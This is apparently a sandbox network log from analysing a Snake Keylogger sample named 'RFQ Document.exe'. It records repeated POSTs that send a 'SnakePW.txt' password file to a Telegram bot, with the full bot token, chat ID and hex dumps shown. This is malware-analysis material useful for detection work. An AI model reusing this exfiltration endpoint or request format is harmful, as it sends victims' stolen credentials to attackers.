Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:00 UTC	211	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:00 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:00 UTC	212	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12719,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
133	192.168.2.4	49932	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:00 UTC	212	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d95563e5 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:00 UTC	212	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 35 35 36 33 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d95563e5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:00 UTC	213	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:00 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:00 UTC	213	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12720,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
134	192.168.2.4	49933	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:00 UTC	214	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d972014a Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:00 UTC	214	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 37 32 30 31 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d972014aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:00 UTC	214	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:00 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:00 UTC	215	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12721,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
135	192.168.2.4	49934	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:00 UTC	215	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d990fe2e Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:00 UTC	216	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 39 30 66 65 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d990fe2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:00 UTC	216	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:00 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:00 UTC	216	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12722,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
136	192.168.2.4	49935	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:00 UTC	217	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d9affcf6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:00 UTC	217	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 61 66 66 63 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d9affcf6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:00 UTC	218	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:00 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:00 UTC	218	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12723,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
137	192.168.2.4	49936	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:00 UTC	219	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d9cefbed Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:00 UTC	219	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 63 65 66 62 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d9cefbedContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:01 UTC	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:01 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:01 UTC	220	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12724,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
138	192.168.2.4	49937	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:01 UTC	220	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255d9edf9e7 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:01 UTC	221	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 65 64 66 39 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255d9edf9e7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:01 UTC	221	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:01 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:01 UTC	221	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12725,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
139	192.168.2.4	49938	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:01 UTC	222	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255da0a972b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:01 UTC	222	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 30 61 39 37 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255da0a972bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:01 UTC	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:01 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:01 UTC	223	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64 Data Ascii: 